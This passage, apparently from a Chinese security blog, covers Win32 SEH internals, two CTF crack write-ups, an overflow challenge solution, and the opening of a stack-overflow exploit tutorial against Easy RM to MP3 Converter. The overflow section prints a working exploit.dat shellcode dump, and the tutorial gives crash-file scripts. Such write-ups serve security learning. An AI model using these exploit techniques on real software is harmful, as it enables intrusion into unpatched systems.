70 00401320 mov dword ptr fs:[0],ecx
71 00401327 pop edi
72 00401328 pop esi
73 00401329 pop ebx
74 0040132A add esp,5Ch
75 0040132D cmp ebp,esp
76 0040132F call __chkesp (004013f0)
77 00401334 mov esp,ebp
78 00401336 pop ebp
79 00401337 ret
80
81
82 99: void Function1( void )
83 100: {
84 004011A0 push ebp
85 004011A1 mov ebp,esp
86 004011A3 push 0FFh
87 004011A5 push offset string "_except_handler3 is at address: "...+30h (004220e0)
88 004011AA push offset __except_handler3 (00401430)
89 004011AF mov eax,fs:[00000000]
90 004011B5 push eax
91 004011B6 mov dword ptr fs:[0],esp
92 004011BD add esp,0B4h
93 004011C0 push ebx
94 004011C1 push esi
95 004011C2 push edi
96 004011C3 mov dword ptr [ebp-18h],esp
97 004011C6 lea edi,[ebp-5Ch]
98 004011C9 mov ecx,11h
99 004011CE mov eax,0CCCCCCCCh
100 004011D3 rep stos dword ptr [edi]
101 101: int i;
102 102: // Nest 3 levels of __try blocks to force 3 elements in the scopetable array
103 103: __try
104 004011D5 mov dword ptr [ebp-4],0
105 104: {
106 105: __try
107 004011DC mov dword ptr [ebp-4],1
108 106: {
109 107: __try
110 004011E3 mov dword ptr [ebp-4],2
111 108: {
112 109: i = i/0;
113 004011EA mov eax,dword ptr [ebp-1Ch]
114 004011ED cdq
115 0
</code></pre></div></div>
<p>Lines 5~10 register the exception handler, though differently from our hand-written version.</p>
<p>First, __except_handler3 is used as the exception handler. When compiling a __try{}__except{} construct, the compiler always registers one uniform function as the handler instead of generating a separate handler for each piece of SEH code. Different compilers may use different handler functions; here it is __except_handler3 of the VC6 compiler. The handler is invoked by the system's dispatch functions, i.e. RtlDispatchException -> ExecuteHandler -> ExecuteHandler2 -> __except_handler3, and the number of parameters is fixed. This means adding new parameters is not feasible; the only way out is to extend the existing ones, using a cast to turn a simple type into a larger type containing extra fields. This is exactly the approach VC takes, which brings us to the second difference.</p>
<p>Second, before setting up the EXCEPTION_REGISTRATION_RECORD on the stack (lines 7~9), the compiler-generated code first pushes an integer called trylevel (line 5) and a scopetable pointer to a scopetable_entry array (line 6), so that what actually forms on the stack is the following _EXCEPTION_REGISTRATION structure:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct _EXCEPTION_REGISTRATION{
struct _EXCEPTION_REGISTRATION *prev;
void (*handler)(PEXCEPTION_RECORD,PEXCEPTION_REGISTRATION,PCONTEXT,PEXCEPTION_RECORD);
struct scopetable_entry *scopetable;
int trylevel;
int _ebp;
}
</code></pre></div></div>
<p>The fields are described below.</p>
<p>1. scopetable</p>
<p>This pointer points to an array whose elements are scopetable_entry structures, each describing one __try{}__except construct.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct scopetable_entry
{
DWORD previousTryLevel;
FARPROC lpfnFilter;
FARPROC lpfnHandler;
}
</code></pre></div></div>
<p>Here lpfnFilter and lpfnHandler hold the start addresses of the filter expression and the exception handler block of a __try{}__except construct. Looking again at the example above:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>00422130 FF FF FF FF CC 12 40 00 D2 12 40 00 FF FF FF FF ......@...@.....
00422140 FE 12 40 00 04 13 40 00
</code></pre></div></div>
<p>A function registers a single _EXCEPTION_REGISTRATION, and each try/except corresponds to one element of the scopetable.
In this example, main contains two __try blocks, so there are two elements. The first FFFFFFFF means the block is not nested in any __try construct; 004012CC is the filter function of the first __try, and 004012D2 is the handler of the first __try.</p>
<p>2. trylevel</p>
<p>trylevel is the index into the scopetable currently in effect. At the very start of main it is -1, meaning we are not inside any try construct. On entering the first try block the variable is set to 0 (line 23), meaning that if an exception occurs, the first element of the scopetable should be consulted; after leaving the first try block it is set back to -1 (line 43).</p>
<p>To better understand scopetable and trylevel, let's examine Function1 in more depth. Its scopetable is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>004220E0 FF FF FF FF 2F 12 40 00 32 12 40 00 00 00 00 00 ..../.@.2.@.....
004220F0 19 12 40 00 1C 12 40 00 01 00 00 00 03 12 40 00 ..@...@.......@.
00422100 06 12 40 00
</code></pre></div></div>
<p>This scopetable has three elements. The first has previousTryLevel -1, meaning it is not inside any try block; the second has previousTryLevel 0, meaning it is nested inside scopetable element 0; the third is similar. From lines 104~110 we can see that trylevel is set each time a try block is entered.</p>
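The raw dump above decodes mechanically into three {previousTryLevel, lpfnFilter, lpfnHandler} triples; a short Python sketch (previousTryLevel is read as a signed DWORD, so FFFFFFFF comes out as -1):

```python
import struct

# scopetable bytes dumped at 004220E0 for Function1
raw = bytes.fromhex(
    'ffffffff2f1240003212400000000000'
    '191240001c12400001000000'
    '0312400006124000'
)

entries = [struct.unpack('<iII', raw[i:i + 12])
           for i in range(0, len(raw), 12)]
for prev, lpfn_filter, lpfn_handler in entries:
    print(prev, hex(lpfn_filter), hex(lpfn_handler))
# -1 0x40122f 0x401232
# 0 0x401219 0x40121c
# 1 0x401203 0x401206
```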
<p>Let's first look at pseudocode for __except_handler3 and then summarize how it works:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int __except_handler3(
struct _EXCEPTION_RECORD * pExceptionRecord,
struct EXCEPTION_REGISTRATION * pRegistrationFrame,
struct _CONTEXT *pContextRecord,
void * pDispatcherContext )
{
LONG filterFuncRet;
LONG trylevel;
EXCEPTION_POINTERS exceptPtrs;
PSCOPETABLE pScopeTable;
CLD // Reset the direction flag (without testing any condition!)
// If neither EXCEPTION_UNWINDING nor EXCEPTION_EXIT_UNWIND is set,
// this is the first time this handler has been called
// (that is, we are not in the unwinding phase)
if ( ! (pExceptionRecord->ExceptionFlags
& (EXCEPTION_UNWINDING | EXCEPTION_EXIT_UNWIND)) )
{
// Build an EXCEPTION_POINTERS structure on the stack
exceptPtrs.ExceptionRecord = pExceptionRecord;
exceptPtrs.ContextRecord = pContextRecord;
// Put the address of the EXCEPTION_POINTERS structure defined above
// 4 bytes below the establisher frame. See the assembly code the
// compiler generates for GetExceptionInformation, discussed earlier
*(PDWORD)((PBYTE)pRegistrationFrame - 4) = &exceptPtrs;
// Get the initial "trylevel" value
trylevel = pRegistrationFrame->trylevel;
// Get the pointer to the scopetable array
scopeTable = pRegistrationFrame->scopetable;
search_for_handler:
if ( pRegistrationFrame->trylevel != TRYLEVEL_NONE )
{
if ( pRegistrationFrame->scopetable[trylevel].lpfnFilter )
{
PUSH EBP // Save this frame pointer
// !!!VERY IMPORTANT!!! Switch back to the original EBP. This is
// what allows all the locals of the frame to keep their values
// after the exception has occurred.
EBP = &pRegistrationFrame->_ebp;
// Call the filter function
filterFuncRet = scopetable[trylevel].lpfnFilter();
POP EBP // Restore the exception handler's frame pointer
if ( filterFuncRet != EXCEPTION_CONTINUE_SEARCH )
{
if ( filterFuncRet < 0 ) // EXCEPTION_CONTINUE_EXECUTION
return ExceptionContinueExecution;
// If we get here, the return value is EXCEPTION_EXECUTE_HANDLER
scopetable = pRegistrationFrame->scopetable;
// Let the OS clean up the registered frames; this causes this
// function to be called recursively
__global_unwind2( pRegistrationFrame );
// Once we get here, all frames except the last one have been
// cleaned up, and execution continues from the last frame
EBP = &pRegistrationFrame->_ebp;
__local_unwind2( pRegistrationFrame, trylevel );
// NLG = "non-local-goto" (setjmp/longjmp stuff)
__NLG_Notify( 1 ); // EAX = scopetable->lpfnHandler
// Set the current trylevel to the content of the SCOPETABLE
// element in use when a handler was found
pRegistrationFrame->trylevel = scopetable->previousTryLevel;
// Call the __except {} block; this call does not return
pRegistrationFrame->scopetable[trylevel].lpfnHandler();
}
}
scopeTable = pRegistrationFrame->scopetable;
trylevel = scopeTable->previousTryLevel;
goto search_for_handler;
}
else // trylevel == TRYLEVEL_NONE
{
return ExceptionContinueSearch;
}
}
else // EXCEPTION_UNWINDING or EXCEPTION_EXIT_UNWIND is set
{
PUSH EBP // Save EBP
EBP = &pRegistrationFrame->_ebp; // Set up EBP for the call to __local_unwind2
__local_unwind2( pRegistrationFrame, TRYLEVEL_NONE )
POP EBP // Restore EBP
return ExceptionContinueSearch;
}
}
</code></pre></div></div>
<p>The main operations performed by __except_handler3 are:</p>
<p>1. Cast the second parameter pRegistrationRecord from the system's default EXCEPTION_REGISTRATION_RECORD structure to the extended _EXCEPTION_REGISTRATION structure.</p>
<p>2. Read the trylevel field from pRegistrationRecord into a local variable nTrylevel, then use nTrylevel to index the array pointed to by the scopetable field and locate a scopetable_entry structure.</p>
<p>3. Read the lpfnFilter field from the scopetable_entry. If it is not NULL, call it, i.e. evaluate the filter expression; if it is NULL, go to step 5.</p>
<p>4. If lpfnFilter returns something other than EXCEPTION_CONTINUE_SEARCH, prepare to execute the function specified by lpfnHandler, which never returns. If the filter returns EXCEPTION_CONTINUE_SEARCH, fall through to step 5.</p>
<p>5. Check the previousTryLevel field of the scopetable_entry. If it is not -1, assign it to nTrylevel and go back to step 2 to continue the loop. If previousTryLevel is -1, continue to step 6.</p>
<p>6. Return DISPOSITION_CONTINUE_SEARCH so the system (RtlDispatchException) keeps looking for other exception handlers.</p>
<p>How does __except_handler3 call the __except block with a CALL instruction without the flow ever returning? Since CALL pushes a return address onto the stack, you might expect this to corrupt it. If you examine the code the compiler generates for the __except block, you will find that the first thing it does is load into ESP a DWORD stored 8 bytes below the EXCEPTION_REGISTRATION structure, i.e. at [EBP-18H] (the actual instruction is MOV ESP, DWORD PTR [EBP-18H]); this value was saved there by the function's prolog code (MOV DWORD PTR [EBP-18H], ESP).</p>
<p>The process above omits global and local unwinding, which we discuss in the next section.</p>
<h3 id="第四节">四. 展开</h3>
<p>为了说明这个概念,需要先回顾下异常发生后的处理流程。</p>
<p>我们假设一系列使用 SEH 的函数调用流程:
func1 -> func2 -> func3。在 func3 执行的过程中触发了异常。</p>
<p>看看分发异常流程 RtlRaiseException -> RtlDispatchException -> RtlpExecuteHandlerForException
RtlDispatchException 会遍历异常链表,对每个 EXCEPTION_REGISTRATION 都调用 RtlpExecuteHandlerForException。
RtlpExecuteHandlerForException 会调用 EXCEPTION_REGISTRATION::handler,也就是 __except_handler3。如上面分析,该函数内部遍历 EXCEPTION_REGISTRATION::scopetable,如果遇到某个 scopetable_entry::lpfnFilter 返回 EXCEPTION_EXECUTE_HANDLER,那么对应的 scopetable_entry::lpfnHandler 就会被调用来处理该异常。
因为 lpfnHandler 不会返回到__except_handler3,于是执行完 lpfnHandler 后,就会从 lpfnHandler 之后的代码继续执行下去。也就是说,假设 func3 中触发了一个异常,该异常被 func1 中的 __except 处理块处理了,那 __except 处理块执行完毕后,就从其后的指令继续执行下去,即异常处理完毕后,接着执行的就是 func1 的代码。不会再回到 func2 或者 func3,这样就有个问题,func2 和 func3 中占用的资源怎么办?这些资源比如申请的内存是不会自动释放的,岂不是会有资源泄漏问题?</p>
<p>这就需要用到“展开”了。
说白了,所谓“展开”就是进行清理。(注:这里的清理主要包含动态分配的资源的清理,栈空间是由 func1 的“mov esp,ebp” 这类操作顺手清理的。当时我被“谁来清理栈空间”这个问题困扰了很久……)</p>
<p>那这个展开工作由谁来完成呢?由 func1 来完成肯定不合适,毕竟 func2 和 func3 有没有申请资源、申请了哪些资源,func1 无从得知。于是这个展开工作还得要交给 func2 和 func3 自己来完成。</p>
<p>展开分为两种:“全局展开”和“局部展开”。
全局展开是指针对异常链表中的某一段,局部展开针对指定 EXCEPTION_REGISTRATION。用上面的例子来讲,局部展开就是针对 func3 或 func2 (某一个函数)内部进行清理,全局展开就是 func2 和 func3 的局部清理的总和。再归纳一下,局部展开是指具体某一函数内部的清理,而全局展开是指,从异常触发点(func3)到异常处理点(func1)之间所有函数(包含异常触发点 func3)的局部清理的总和。</p>
<p>使用RtlUnwind来进行展开。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void _RtlUnwind( PEXCEPTION_REGISTRATION pRegistrationFrame,
PVOID returnAddr, // 并未使用!(至少是在i386机器上)
PEXCEPTION_RECORD pExcptRec,
DWORD _eax_value)
{
DWORD stackUserBase;
DWORD stackUserTop;
EXCEPTION_RECORD excptRec;
CONTEXT context;
// 从FS:[4]和FS:[8]处获取堆栈的界限
RtlpGetStackLimits( &stackUserBase, &stackUserTop );
if ( 0 == pExcptRec ) // 正常情况
{
pExcptRec = &excptRec;
pExcptRec->ExceptionFlags = 0;
pExcptRec->ExceptionCode = STATUS_UNWIND;
pExcptRec->ExceptionRecord = 0;
pExcptRec->ExceptionAddress = [ebp+4]; // RtlpGetReturnAddress()—获取返回地址
pExcptRec->ExceptionInformation[0] = 0;
}
if ( pRegistrationFrame )
pExcptRec->ExceptionFlags |= EXCEPTION_UNWINDING;
else // 这两个标志合起来被定义为EXCEPTION_UNWIND_CONTEXT
pExcptRec->ExceptionFlags|=(EXCEPTION_UNWINDING|EXCEPTION_EXIT_UNWIND);
context.ContextFlags =( CONTEXT_i486 | CONTEXT_CONTROL |
CONTEXT_INTEGER | CONTEXT_SEGMENTS);
RtlpCaptureContext( &context );
context.Esp += 0x10;
context.Eax = _eax_value;
PEXCEPTION_REGISTRATION pExcptRegHead;
pExcptRegHead = RtlpGetRegistrationHead(); // 返回FS:[0]的值
// 开始遍历EXCEPTION_REGISTRATION结构链表
while ( -1 != pExcptRegHead )
{
EXCEPTION_RECORD excptRec2;
if ( pExcptRegHead == pRegistrationFrame )
{
NtContinue( &context, 0 );
}
else
{
// 如果存在某个异常帧在堆栈上的位置比异常链表的头部还低
// 说明一定出现了错误
if ( pRegistrationFrame && (pRegistrationFrame <= pExcptRegHead) )
{
// 生成一个异常
excptRec2.ExceptionRecord = pExcptRec;
excptRec2.NumberParameters = 0;
excptRec2.ExceptionCode = STATUS_INVALID_UNWIND_TARGET;
excptRec2.ExceptionFlags = EXCEPTION_NONCONTINUABLE;
RtlRaiseException( &excptRec2 );
}
}
PVOID pStack = pExcptRegHead + 8; // 8 = sizeof(EXCEPTION_REGISTRATION)
// 确保pExcptRegHead在堆栈范围内,并且是4的倍数
if ( (stackUserBase <= pExcptRegHead )
&& (stackUserTop >= pStack )
&& (0 == (pExcptRegHead & 3)) )
{
DWORD pNewRegistHead;
DWORD retValue;
retValue = RtlpExecuteHandlerForUnwind(pExcptRec, pExcptRegHead, &context,
&pNewRegistHead, pExcptRegHead->handler );
if ( retValue != DISPOSITION_CONTINUE_SEARCH )
{
if ( retValue != DISPOSITION_COLLIDED_UNWIND )
{
excptRec2.ExceptionRecord = pExcptRec;
excptRec2.NumberParameters = 0;
excptRec2.ExceptionCode = STATUS_INVALID_DISPOSITION;
excptRec2.ExceptionFlags = EXCEPTION_NONCONTINUABLE;
RtlRaiseException( &excptRec2 );
}
else
pExcptRegHead = pNewRegistHead;
}
PEXCEPTION_REGISTRATION pCurrExcptReg = pExcptRegHead;
pExcptRegHead = pExcptRegHead->prev;
RtlpUnlinkHandler( pCurrExcptReg );
}
else // 堆栈已经被破坏!生成一个异常
{
excptRec2.ExceptionRecord = pExcptRec;
excptRec2.NumberParameters = 0;
excptRec2.ExceptionCode = STATUS_BAD_STACK;
excptRec2.ExceptionFlags = EXCEPTION_NONCONTINUABLE;
RtlRaiseException( &excptRec2 );
}
}
// 如果执行到这里,说明已经到了EXCEPTION_REGISTRATION
// 结构链表的末尾,正常情况下不应该发生这种情况。
//(因为正常情况下异常应该被处理,这样就不会到链表末尾)
if ( -1 == pRegistrationFrame )
NtContinue( &context, 0 );
else
NtRaiseException( pExcptRec, &context, 0 );
}
RtlUnwind函数的伪代码到这里就结束了,以下是它调用的几个函数的伪代码:
PEXCEPTION_REGISTRATION RtlpGetRegistrationHead( void )
{
return FS:[0];
}
RtlpUnlinkHandler( PEXCEPTION_REGISTRATION pRegistrationFrame )
{
FS:[0] = pRegistrationFrame->prev;
}
void RtlpCaptureContext( CONTEXT * pContext )
{
pContext->Eax = 0;
pContext->Ecx = 0;
pContext->Edx = 0;
pContext->Ebx = 0;
pContext->Esi = 0;
pContext->Edi = 0;
pContext->SegCs = CS;
pContext->SegDs = DS;
pContext->SegEs = ES;
pContext->SegFs = FS;
pContext->SegGs = GS;
pContext->SegSs = SS;
pContext->EFlags = flags; // 它对应的汇编代码为__asm{ PUSHFD / pop [xxxxxxxx] }
pContext->Eip = 此函数的调用者的调用者的返回地址 // 读者看一下这个函数的
pContext->Ebp = 此函数的调用者的调用者的EBP // 汇编代码就会清楚这一点
pContext->Esp = pContext->Ebp + 8;
}
</code></pre></div></div>
<p>虽然 RtlUnwind 函数的规模看起来很大,但是如果你按一定方法把它分开,其实并不难理解。它首先从FS:[4]和FS:[8]处获取当前线程堆栈的界限。它们对于后面要进行的合法性检查非常重要,以确保所有将要被展开的异常帧都在堆栈范围内。</p>
<p>RtlUnwind 接着在堆栈上创建了一个空的EXCEPTION_RECORD结构并把STATUS_UNWIND赋给它的ExceptionCode域,同时把 EXCEPTION_UNWINDING标志赋给它的 ExceptionFlags 域。指向这个结构的指针作为其中一个参数被传递给每个异常回调函数。然后,这个函数调用RtlCaptureContext函数来创建一个空的CONTEXT结构,这个结构也变成了在展开阶段调用每个异常回调函数时传递给它们的一个参数。</p>
<p>RtlUnwind函数的其余部分遍历EXCEPTION_REGISTRATION结构链表。对于其中的每个帧,它都调用 RtlpExecuteHandlerForUnwind 函数,正是这个函数带 EXCEPTION_UNWINDING 标志调用了异常处理回调函数。RtlpExecuteHandlerForException的代码与RtlpExecuteHandlerForUnwind的代码极其相似。这两个“函数”都只是简单地给EDX寄存器加载一个不同的值然后就调用ExecuteHandler函数。也就是说,RtlpExecuteHandlerForException和RtlpExecuteHandlerForUnwind都是 ExecuteHandler这个公共函数的前端。</p>
<p>ExecuteHandler查找EXCEPTION_REGISTRATION结构的handler域的值并调用它。令人奇怪的是,对异常处理回调函数的调用本身也被一个结构化异常处理程序封装着。在SEH自身中使用SEH看起来有点奇怪,但你思索一会儿就会理解其中的含义。如果在异常回调过程中引发了另外一个异常,操作系统需要知道这个情况。根据异常发生在最初的回调阶段还是展开回调阶段,ExecuteHandler或者返回DISPOSITION_NESTED_EXCEPTION,或者返回DISPOSITION_COLLIDED_UNWIND。这两者都是“红色警报!现在把一切都关掉!”类型的代码。
每次回调之后,它调用RtlpUnlinkHandler 移除相应的异常帧。</p>
<p>RtlUnwind 函数的第一个参数是一个帧的地址,当它遍历到这个帧时就停止展开异常帧。上面所说的这些代码之间还有一些安全性检查代码,它们用来确保不出问题。如果出现任何问题,RtlUnwind 就引发一个异常,指示出了什么问题,并且这个异常带有EXCEPTION_NONCONTINUABLE 标志。当一个进程被设置了这个标志时,它就不允许再运行,必须终止。</p>
<p>参考:</p>
<ol>
<li>
<p>A Crash Course on the Depths of Win32™ Structured Exception Handling</p>
</li>
<li>
<p>SEH分析笔记(X86篇)</p>
</li>
<li>
<p>《软件调试》张银奎</p>
</li>
<li>
<p>ReactOS源码</p>
</li>
<li>
<p>wrk源码</p>
</li>
</ol>
XDCSC2010破解题22014-03-25T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/03/25/xdcsc-04pojie
<p>程序下载<a href="/assets/file/xdcsc2010/04pojie.zip">04破解</a>
丢到IDA里面一看,当场吓尿了,这么蛋疼地算过去算过来,要分析到什么时候去。好在这个程序的流程非常清楚:输入一个参数,经过各种运算,最终将得到的结果与</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1011010011110110
</code></pre></div></div>
<p>相比,如果相同就Yes,否则Sorry。既然题目的readme说密码为三位数字,我直接将000——999枚举一遍就ok了。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import os
#f = open('ret.txt','w')
for i in range(10):
    for j in range(10):
        for k in range(10):
            param = str(i) + str(j) + str(k)
            ret = os.popen('1.exe ' + param)
            #f.write(param + ":" + ret.read())
            if ret.read() == "Yes\n":
                print 'The answer is :' + param
#f.close()
</code></pre></div></div>
<p>下面是python中的结果:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>>>>
The answer is :918
>>>
</code></pre></div></div>
<p>再次运行原程序:</p>
<p><img src="/assets/img/xdcsc2010/04pojie/1.PNG" alt="" /></p>
XDCSC2010破解题12014-03-17T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/03/17/xdcsc-03pojie
<p>这是一个破解题,程序下载<a href="/assets/file/xdcsc2010/03pojie.zip">03破解</a>
程序是要求输入正确的密码,感觉这种题应该不算太难。直接甩到IDA里面,F5(不要鄙视我老是F5,F5看大概,之后OD看细节),一看不打紧,结果发现流程清清楚楚,顿时喜上眉梢。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int __cdecl wmain()
{
const char *v1; // [sp-4h] [bp-20Ch]@2
char v2; // [sp+4h] [bp-204h]@1
char Dst; // [sp+5h] [bp-203h]@1
unsigned int v4; // [sp+204h] [bp-4h]@1
int v5; // [sp+208h] [bp+0h]@1
v4 = (unsigned int)&v5 ^ __security_cookie;
printf(&Format);
v2 = 0;
memset(&Dst, 0, 0x1FFu);
scanf(&byte_402108, &v2);
if ( strcmp(&v2, (const char *)&unk_40210C) )
v1 = &byte_402130;
else
v1 = (const char *)&unk_402114;
printf(v1);
return 0;
}
</code></pre></div></div>
<p>这就是直接将输入字符串进行对比就行了。然后一看40210C处的字符串,傻了眼,有个0x1F,这在键盘上是没有对应按键的,肿么输入啊。这个时候我想到了以前一个同学问过的同样的问题:如何在cmd里输入键盘上没有对应字符的内容。当时隐约记得可以通过管道,但是解这个题的时候没有想到。后来问了下吴哥,他一说重定向我马上就明白了。靠,这都忘了。</p>
<p>我们看到对应的密码是如图:</p>
<p><img src="/assets/img/xdcsc2010/03pojie/1.PNG" alt="" /></p>
<p>然后我就老老实实构造了一个二进制文件data,内容如下</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1F 65 63 6D 32 30 34 00
</code></pre></div></div>
<p>cmd执行</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>软件破解1.exe < data
</code></pre></div></div>
<p>结果显示密码错误。这里面其实涉及scanf函数的一个特点。我们一般用scanf的时候都是</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>scanf("%s",a)
scanf("%d",&d)
</code></pre></div></div>
<p>这种格式,其实scanf还支持scanf(“This is test%s”,a)这种带前缀字面字符的格式:输入时必须先输入与格式串中的非格式控制字符“This is test”完全一致的内容,之后%s才开始匹配,并且缓冲区a只存放%s对应的部分。这个程序里是将密码与缓冲区逐字节比较。我们的data中第一个1F被当作格式串里的非格式控制字符消耗掉了,为了跟密码一致,还得再输入一个1F,也就是data的内容应该是:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1F 1F 65 63 6D 32 30 34 00
</code></pre></div></div>
<p>换成这个data,再执行</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>软件破解1.exe < data
</code></pre></div></div>
<p>就成功了。</p>
<p><img src="/assets/img/xdcsc2010/03pojie/2.PNG" alt="" /></p>
一道XDCSC2010溢出题2014-03-17T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/03/17/xdcsc-01yichu
<p>昨天偶然上了一下xdsec.org,发现上面放了往年的比赛题目,抱着试一试的心态下了xdcsc2010的题目来看看,这是第一个题的笔记。</p>
<p>这是一个溢出题,程序下载<a href="/assets/file/xdcsc2010/01yichu.zip">ExploitMe</a>,题目要求如下:</p>
<p><img src="/assets/img/xdcsc2010/01yichu/1.png" alt="" /></p>
<p>抄起IDA,找到关键函数,F5一把,下面是大概的流程</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>signed int __cdecl sub_401000()
{
HANDLE v0; // eax@1
void *v1; // edi@1
void *v2; // ebp@1
HANDLE v3; // eax@1
void *v4; // esi@1
unsigned int v5; // ebx@2
HMODULE v6; // esi@3
signed int v8; // [sp+10h] [bp-318h]@1
void *hHeap; // [sp+14h] [bp-314h]@1
HANDLE v10; // [sp+18h] [bp-310h]@1
DWORD NumberOfBytesRead; // [sp+1Ch] [bp-30Ch]@1
int (**v12)(); // [sp+20h] [bp-308h]@1
char v13; // [sp+24h] [bp-304h]@4
int v14; // [sp+A4h] [bp-284h]@1
char v15; // [sp+A8h] [bp-280h]@6
char Buffer; // [sp+128h] [bp-200h]@3
v8 = 0;
v12 = &off_4050B4;
v14 = (int)off_4050B0;
NumberOfBytesRead = 0;
v0 = HeapCreate(0, 0x1000u, 0x10000u);
v1 = v0;
hHeap = v0;
v2 = HeapAlloc(v0, 0, 0x200u);
v3 = CreateFileA("exploit.dat", 0x80000000u, 1u, 0, 4u, 0x80u, 0);
v4 = v3;
v10 = v3;
if ( v3 != (HANDLE)-1 )
{
v5 = GetFileSize(v3, 0);
if ( v5 <= 0x200 )
{
ReadFile(v4, &Buffer, v5, &NumberOfBytesRead, 0);
memcpy(v2, &Buffer, v5);
memset(&Buffer, 0, 0x200u);
v6 = LoadLibraryA("user32.dll");
dword_408510 = (int)GetProcAddress(v6, "MessageBoxW");
dword_408514 = (int)GetProcAddress(v6, "MessageBoxA");
if ( v5 <= 0x84 )
memcpy(&v13, v2, v5);
HeapFree(hHeap, 1u, v2);
memset(v2, 0, 0x80u);
if ( v5 <= 0x84 )
memcpy(&v15, v2, v5);
((void (__thiscall *)(int (***)()))*v12)(&v12);
(*(void (__thiscall **)(int *))v14)(&v14);
v1 = hHeap;
v4 = v10;
v8 = 1;
}
}
if ( v4 )
CloseHandle(v4);
if ( v2 )
HeapFree(v1, 1u, v2);
if ( v1 )
HeapDestroy(v1);
return v8;
}
</code></pre></div></div>
<p>程序流程还是比较明了的:先读取exploit.dat里面的数据到stack上面,接着拷到heap,再倒腾回stack,真是蛋疼。之前就受这个影响考虑多了,以为要涉及堆溢出等。主要是要注意到函数末尾的两个call,即v12和v14,经过调试可以发现v14里面的数据是我们可以控制的。这里我犯了一个错误,导致浪费了大量时间:我当时注意到函数中已经得到了MessageBoxA的地址(dword_408514),就想直接跳过去,但是由于esp在低地址,参数老是构造不好,因为esp那块数据没有办法覆盖。</p>
<p>今天上午才突然开了窍,既然eip都控制了,还有啥干不了的,直接将eip定位到stack上我们能够覆盖到的数据,然后写几句压栈的shellcode,之后跳转到MessageBoxA里面去。最终的exploit.dat如下</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>00000000h: 7C FC 12 00 51 6A 00 68 C8 FC 12 00 68 D8 FC 12 ; |?.Qj.h赛..h攸.
00000010h: 00 6A 00 B9 14 85 40 00 FF 11 59 C3 00 00 00 00 ; .j.?匑..Y?...
00000020h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000030h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000040h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000050h: 45 78 70 6C 6F 69 74 4D 65 00 00 00 00 00 00 00 ; ExploitMe.......
00000060h: 45 78 70 6C 6F 69 74 20 73 75 63 63 65 73 73 00 ; Exploit success.
00000070h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000080h: 78 FC 12 00 ; x?.
</code></pre></div></div>
<p>溢出结果</p>
<p><img src="/assets/img/xdcsc2010/01yichu/2.PNG" alt="" /></p>
exploit编写笔记1——基于栈的溢出2014-03-16T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/03/16/exploit-buffer-overflow
<p>很早以前对漏洞利用这一块就有所了解,当时觉得这些都是一些小tricky,玩的都是一些故意构造的玩具漏洞。这段时间准备重新拾起来,按照corelan上面的教程,一个一个对着实际的漏洞写exploit。这是第一篇,古老的buffer overflow。因为之前用的都是OD和windbg,现在要练习一下Immunity Debugger,所以这篇都是用的Immunity。</p>
<p><strong>目标软件</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Easy RM to MP3 Converter(版本2.7.3.700)
</code></pre></div></div>
<p><strong>工具</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Immunity Debugger
</code></pre></div></div>
<p><strong>漏洞描述</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>通过创建一个恶意的.m3u文件将触发Easy RM to MP3 Converter (version 2.7.3.700)缓冲区溢出利用。
</code></pre></div></div>
<p><strong>测试平台</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Microsoft Windows XP Professional 5.1.2600 Service Pack 3 Build 2600
</code></pre></div></div>
<p>下面是详细的exploit步骤</p>
<h3>1. 漏洞触发</h3>
<p>我们首先构造一个30000个字符的.m3u文件,前面25000全为’A’,后5000个为’B’。下面是构造的脚本</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> filename = "crash.m3u"
f = open(filename,'w')
data = 'A' * 25000 + 'B' * 5000
f.write(data)
f.close()
</code></pre></div></div>
<p>使用Easy RM to MP3 Converter加载这个crash.m3u文件,可以看到发生错误,查看详细信息,如图。</p>
<p><img src="/assets/img/exploit1/1.PNG" alt="" /></p>
<p>从图可以看到,溢出之后的返回地址是0x42424242,也就是’BBBB’,这说明要覆盖的EIP在25000到30000之间。下面使用Immunity的插件mona来进行精确定位。</p>
<h3>2. EIP定位</h3>
<p>使用Immunity Debugger加载Easy RM to MP3 Converter,Run起来,加载crash.m3u。遇到异常之后Immunity接手。</p>
<p>首先设置mona的工作目录:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>!mona config -set workingfolder c:\mona\%p
